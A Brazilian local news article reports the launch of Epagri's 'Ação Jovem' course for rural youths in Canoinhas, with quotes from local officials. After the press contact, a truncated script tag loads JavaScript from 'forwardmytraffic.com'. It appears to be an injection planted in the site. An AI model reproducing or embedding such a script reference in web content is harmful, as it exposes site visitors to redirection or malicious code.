InícioPolíticaCoronel Mario participa de lançamento do curso “Ação Jovem: Produção, Organização e...

Coronel Mario participa de lançamento do curso “Ação Jovem: Produção, Organização e Protagonismo” promovido pela Epagri.

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio acumulado em R$ 53 milhões

As seis dezenas do concurso 2.738 serão sorteadas, a...

Veja as vagas de empregos disponíveis em Canoinhas e região

O serviço de intermediação de vagas da Prefeitura de...

Equipe de Capoeira de Três Barras participa de competição no Paraná

Neste domingo, 16, a equipe de capoeira do Grupo...

Com a participação de 29 jovens vindos de dez municípios do Planalto Norte, iniciou na tarde desta quinta, 26, o curso “Ação Jovem: produção, organização e protagonismo”, coordenado pela Empresa de Pesquisa Agropecuária e Extensão Rural de Santa Catarina  (Epagri) regionais de Canoinhas e Mafra e pelo Instituto MAPA. A aula inaugural aconteceu no Centro de Treinamento de Canoinhas (Cetrecan).

 

O curso funcionará em sistema de alternância, com oito semanas de aula na Epagri, e outras semanas sendo aplicado o conhecimento teórico e prático nas residências dos jovens. Essa é a sexta turma do curso que iniciou na região em 2013, com recursos do Programa SC Rural. A partir desse ano o curso terá investimento pelo Instituto MAPA, e durante os quase sete meses de conhecimento técnico e prático, serão investidos mais de R$ 90 mil, somente na região do Planalto Norte.

 

Participam dessa turma jovens rurais das cidades de Bela Vista do Toldo, Major Vieira, Canoinhas, Papanduva, Monte Castelo, Itaiópolis, Rio Negrinho, Mafra, Campo Alegre e São Bento do Sul. Todos os temas do curso serão desenvolvidos principalmente por técnicos da Epagri das áreas de extensão e pesquisa, além de parceiros como Polícia Militar Ambiental e de algumas prefeituras da região.

 

Durante a fala das autoridades, o presidente da câmara de vereadores de Canoinhas, coronel Mario Renato Erzinger (PR) falou aos jovens sobre a vocação da região, que é o agronegócio. “Vocês tem a oportunidade de se tornarem grandes empreendedores, por isso acreditem no potencial de vocês, na nossa região e no trabalho forte da nossa agricultura”.

 

Secretário de Educação de Canoinhas, Osmar Oleskovicz, destacou que a educação é a base para tudo. “Como professor, sei que o que vocês irão aprender nesse curso poderão levar para vida toda de vocês. A educação é a base para tudo”.

 

Gerente regional da Epagri Canoinhas, Donato João Noernberg também falou sobre importante assunto que é a sucessão familiar nas propriedades rurais. “Nesse curso vamos promover importantes encontros entre pais e filhos e debater sobre a sucessão familiar e formas organizativas, discutindo também a produção e protagonismo de cada um em seu meio”.

 

Estiveram presentes no lançamento do curso, o presidente da câmara de vereadores de Canoinhas, Coronel Mario Renanto Erzinger (PR); secretário de Educação, Osmar Oleskovicz, representando no ato o prefeito de Canoinhas, Beto Passos; secretário executivo regional da ADR Mafra, Abel Schroeder; gerentes regionais da Epagri Canoinhas, Donato João Noernberg, e de Mafra, Bernadete Grein; chefe do Cetrecan, Maria Luiz Damaso da Rocha; coordenadores do curso, Adolar Voigt e Ana Paula Machado; e secretário de agricultura de Papanduva, Mário Correa.

 

Informações para imprensa:

Sérgio Teixeira da Silva – Assessoria de Comunicação Câmara de Vereadores

Fone: (47) 3622-3396

… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.